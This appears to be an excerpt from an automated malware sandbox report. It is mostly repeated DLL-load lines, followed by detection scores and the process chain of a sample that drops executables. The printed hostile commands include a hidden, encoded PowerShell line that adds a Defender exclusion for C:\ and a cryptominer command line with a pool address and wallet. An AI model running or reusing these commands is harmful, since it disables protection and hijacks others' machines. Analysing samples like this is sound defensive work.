Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: e2kLb2J2Y7.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: Key.exe.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: e2kLb2J2Y7.exe ReversingLabs: Detection: 57%
Source: e2kLb2J2Y7.exe Virustotal: Detection: 63%
Source: C:\Users\user\Desktop\e2kLb2J2Y7.exe File read: C:\Users\user\Desktop\e2kLb2J2Y7.exe
Source: C:\Users\user\Desktop\e2kLb2J2Y7.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Users\user\Desktop\e2kLb2J2Y7.exe C:\Users\user\Desktop\e2kLb2J2Y7.exe
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAA==
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Local\IsInvalid\koeogrk\Key.exe C:\Users\user\AppData\Local\IsInvalid\koeogrk\Key.exe
Source: C:\Users\user\AppData\Local\IsInvalid\koeogrk\Key.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\xddtyli.exe C:\Users\user\AppData\Local\Temp\xddtyli.exe
Source: unknown Process created: C:\Users\user\AppData\Roaming\RevisionNumber\Values.exe C:\Users\user\AppData\Roaming\RevisionNumber\Values.exe
Source: C:\Users\user\AppData\Roaming\RevisionNumber\Values.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Process created: C:\Users\user\AppData\Local\Temp\zhtyxulkfny.exe C:\Users\user\AppData\Local\Temp\zhtyxulkfny.exe
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o 163.123.142.171:8383 -u 44K2HL2woi2893k79NHDxhSdmL8vLcCcDX5HDn2F3d7fGrUkkCcQutFNXM5FtKq8SKUEjnCioyXVgNqSRMHUC9qX268CRGw.RIG_CPU -p x --algo rx/0 --cpu-max-threads-hint=50
Source: C:\Users\user\Desktop\e2kLb2J2Y7.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
Source: C:\Users\user\Desktop\e2kLb2J2Y7.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\IsInvalid\koeogrk\Key.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor